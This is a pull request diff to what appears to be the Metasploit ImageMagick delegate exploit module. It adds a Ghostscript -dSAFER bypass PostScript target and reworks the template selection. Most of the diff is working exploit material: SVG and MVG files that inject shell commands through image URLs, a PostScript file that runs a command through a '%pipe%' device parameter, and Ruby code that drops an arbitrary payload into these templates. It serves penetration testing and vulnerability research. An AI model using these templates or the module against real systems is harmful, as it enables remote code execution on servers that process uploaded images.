### PR TITLE
Add Ghostscript support to ImageMagick exploit

### DIFF
--- a/data/exploits/imagemagick/delegate/msf.miff
+++ b/data/exploits/imagemagick/delegate/msf.miff
@@ -1,14 +1,0 @@
-id=ImageMagick  version=1.0
-class=DirectClass  colors=0  matte=False
-columns=1  rows=1  depth=16
-colorspace=sRGB
-page=1x1+0+0
-rendering-intent=Perceptual
-gamma=0.454545
-red-primary=0.64,0.33  green-primary=0.3,0.6  blue-primary=0.15,0.06
-white-point=0.3127,0.329
-date:create=2016-05-04T00:19:42-05:00
-date:modify=2016-05-04T00:19:42-05:00
-label={";echo vulnerable"}
-
-:ÿÿÿÿÿÿ

--- a/data/exploits/imagemagick/delegate/msf.mvg
+++ b/data/exploits/imagemagick/delegate/msf.mvg
@@ -3,6 +3,6 @@ encoding "UTF-8"
 viewbox 0 0 1 1
 affine 1 0 0 1 0 0
 push graphic-context
-image Over 0,0 1,1 'https://localhost";echo vulnerable"'
+image Over 0,0 1,1 'https://localhost";echo vulnerable > /dev/tty"'
 pop graphic-context
 pop graphic-context

--- a/data/exploits/imagemagick/delegate/msf.ps
+++ b/data/exploits/imagemagick/delegate/msf.ps
@@ -1,0 +1,4 @@
+%!PS
+currentdevice null true mark /OutputICCProfile (%pipe%echo vulnerable > /dev/tty)
+.putdeviceparams
+quit

--- a/data/exploits/imagemagick/delegate/msf.svg
+++ b/data/exploits/imagemagick/delegate/msf.svg
@@ -1,5 +1,5 @@
 <?xml version="1.0" encoding="UTF-8" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve">  <image id="image0" width="1" height="1" x="0" y="0"
-    xlink:href="&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x2f;&#x2f;&#x6c;&#x6f;&#x63;&#x61;&#x6c;&#x68;&#x6f;&#x73;&#x74;&#x22;&#x3b;echo vulnerable&#x22;" />
+    xlink:href="&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x2f;&#x2f;&#x6c;&#x6f;&#x63;&#x61;&#x6c;&#x68;&#x6f;&#x73;&#x74;&#x22;&#x3b;echo vulnerable > /dev/tty&#x22;" />
 </svg>

--- a/data/exploits/imagemagick/popen/msf.miff
+++ b/data/exploits/imagemagick/popen/msf.miff
@@ -1,14 +1,0 @@
-id=ImageMagick  version=1.0
-class=DirectClass  colors=0  matte=False
-columns=1  rows=1  depth=16
-colorspace=sRGB
-page=1x1+0+0
-rendering-intent=Perceptual
-gamma=0.454545
-red-primary=0.64,0.33  green-primary=0.3,0.6  blue-primary=0.15,0.06
-white-point=0.3127,0.329
-date:create=2016-05-04T00:19:42-05:00
-date:modify=2016-05-04T00:19:42-05:00
-label={";touch vulnerable"}
-
-:ÿÿÿÿÿÿ

--- a/data/exploits/imagemagick/popen/msf.mvg
+++ b/data/exploits/imagemagick/popen/msf.mvg
@@ -3,6 +3,6 @@ encoding "UTF-8"
 viewbox 0 0 1 1
 affine 1 0 0 1 0 0
 push graphic-context
-image Over 0,0 1,1 '|touch vulnerable'
+image Over 0,0 1,1 '|echo vulnerable > /dev/tty'
 pop graphic-context
 pop graphic-context

--- a/data/exploits/imagemagick/popen/msf.svg
+++ b/data/exploits/imagemagick/popen/msf.svg
@@ -1,5 +1,5 @@
 <?xml version="1.0" encoding="UTF-8" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve">  <image id="image0" width="1" height="1" x="0" y="0"
-    xlink:href="&#x7c;touch vulnerable" />
+    xlink:href="&#x7c;echo vulnerable > /dev/tty" />
 </svg>

--- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
@@ -83,19 +83,24 @@ class MetasploitModule < Msf::Exploit
       p = payload.encoded
     end
 
-    if datastore['HAVE_POPEN']
-      file_create(template.sub('touch vulnerable', p))
-    else
-      file_create(template.sub('echo vulnerable', p))
-    end
+    file_create(template.sub('echo vulnerable > /dev/tty', p))
   end
 
   def template
-    File.read(File.join(
-      Msf::Config.data_directory, 'exploits', 'imagemagick',
-      datastore['HAVE_POPEN'] ? 'popen' : 'delegate',
-      target[:template]
-    ))
+    if datastore['HAVE_POPEN']
+      t = 'popen'
+    else
+      t = 'delegate'
+    end
+
+    begin
+      File.read(File.join(
+        Msf::Config.data_directory, 'exploits', 'imagemagick', t,
+        target[:template]
+      ))
+    rescue Errno::ENOENT
+      fail_with(Failure::BadConfig, "Target has no #{t} support")
+    end
   end
 
 end

--- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
@@ -57,9 +57,9 @@ class MetasploitModule < Msf::Exploit
         }
       },
       'Targets'         => [
-        ['SVG file',  template: 'msf.svg'], # convert msf.png msf.svg
-        ['MVG file',  template: 'msf.mvg'], # convert msf.svg msf.mvg
-        ['MIFF file', template: 'msf.miff'] # convert -label "" msf.svg msf.miff
+        ['SVG file', template: 'msf.svg'], # convert msf.png msf.svg
+        ['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg
+        ['PS file',  template: 'msf.ps']   # PoC from taviso
       ],
       'DefaultTarget'   => 0,
       'DefaultOptions'  => {

--- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
@@ -36,8 +36,10 @@ class MetasploitModule < Msf::Exploit
       ],
       'References'      => [
         %w{CVE 2016-3714},
+        %w{CVE 2016-7976},
         %w{URL https://imagetragick.com/},
         %w{URL http://seclists.org/oss-sec/2016/q2/205},
+        %w{URL http://seclists.org/oss-sec/2016/q3/682},
         %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
         %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456},
         %w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669}

--- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
@@ -25,8 +25,8 @@ class MetasploitModule < Msf::Exploit
         (discovered by taviso) to achieve RCE in the Ghostscript delegate.
         Ghostscript versions 9.18 and later are affected.
 
-        If ImageMagick supports popen(), a |-prefixed command will be used for
-        the exploit. No delegates are involved in this exploitation.
+        If USE_POPEN is set to true, a |-prefixed command will be used for the
+        exploit. No delegates are involved in this exploitation.
       },
       'Author'          => [
         'stewie',            # Vulnerability discovery
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit
 
     register_options([
       OptString.new('FILENAME', [true, 'Output file', 'msf.png']),
-      OptBool.new('HAVE_POPEN', [false, 'popen() support', true])
+      OptBool.new('USE_POPEN',  [false, 'Use popen() vector', true])
     ])
   end
 
@@ -87,7 +87,7 @@ class MetasploitModule < Msf::Exploit
   end
 
   def template
-    if datastore['HAVE_POPEN']
+    if datastore['USE_POPEN']
       t = 'popen'
     else
       t = 'delegate'

--- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
@@ -21,8 +21,9 @@ class MetasploitModule < Msf::Exploit
         a .png (for example) which is actually a crafted SVG (for example) that
         triggers the command injection.
 
-        Tested on Linux, BSD, and OS X. You'll want to choose your payload
-        carefully due to portability concerns. Use cmd/unix/generic if need be.
+        The PostScript (PS) target leverages a Ghostscript -dSAFER bypass
+        (discovered by taviso) to achieve RCE in the Ghostscript delegate.
+        Ghostscript versions 9.18 and later are affected.
 
         If ImageMagick supports popen(), a |-prefixed command will be used for
         the exploit. No delegates are involved in this exploitation.


### PR DESCRIPTION
Please read http://seclists.org/oss-sec/2016/q3/628 and http://seclists.org/oss-sec/2016/q4/29.

Note: only PostScript is supported at this time.
- [x] Test all templates independently of Metasploit
- [x] Test all targets with `HAVE_POPEN` set to `true` (default)
- [x] Test all targets with `HAVE_POPEN` set to `false`
#6848, #6922
